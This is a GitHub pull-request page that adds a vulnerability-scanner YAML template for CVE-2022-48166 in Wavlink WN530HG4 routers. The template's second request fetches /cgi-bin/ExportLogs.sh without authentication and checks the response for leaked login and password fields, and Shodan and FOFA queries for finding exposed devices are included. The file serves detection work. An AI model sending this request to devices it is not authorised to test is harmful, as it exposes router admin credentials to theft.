Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create CVE-2022-48166.yaml #11156

Merged
merged 2 commits into from
Nov 18, 2024
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
52 changes: 52 additions & 0 deletions http/cves/2022/CVE-2022-48166.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,52 @@
id: CVE-2022-48166

info:
name: Wavlink WL-WN530HG4 M30HG4.V5030.201217 - Information Disclosure
author: ritikchaddha
severity: high
description: |
An access control issue in Wavlink WL-WN530HG4 M30HG4.V5030.201217 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.
impact: |
Successful exploitation could lead to sensitive information disclosure.
reference:
- https://docs.google.com/document/d/1zvbuu3Hkk3CAkojAivlUESvtHblHJNLJdpGOoNtk-Vo/edit?usp=sharing
- https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK%20WN530HG4.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-48166
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-48166
cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.201217:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: wavlink
product: wn530hg4_firmware
shodan-query: html:"WN530HG4"
fofa-query: body="WN530HG4"
tags: cve,cve2022,wavlink,exposure,wn530hg4

flow: http(1) && http(2)

http:
- method: GET
path:
- "{{BaseURL}}"

matchers:
- type: dsl
dsl:
- 'contains(body, "WN530HG4")'
internal: true

- method: GET
path:
- "{{BaseURL}}/cgi-bin/ExportLogs.sh"

matchers:
- type: dsl
dsl:
- 'contains_all(body, "Login=", "Password=", "WiFi_", "WAVLINK")'
- 'contains_all(header, "application/octet-stream", "filename=\"")'
- 'status_code == 200'
condition: and
Loading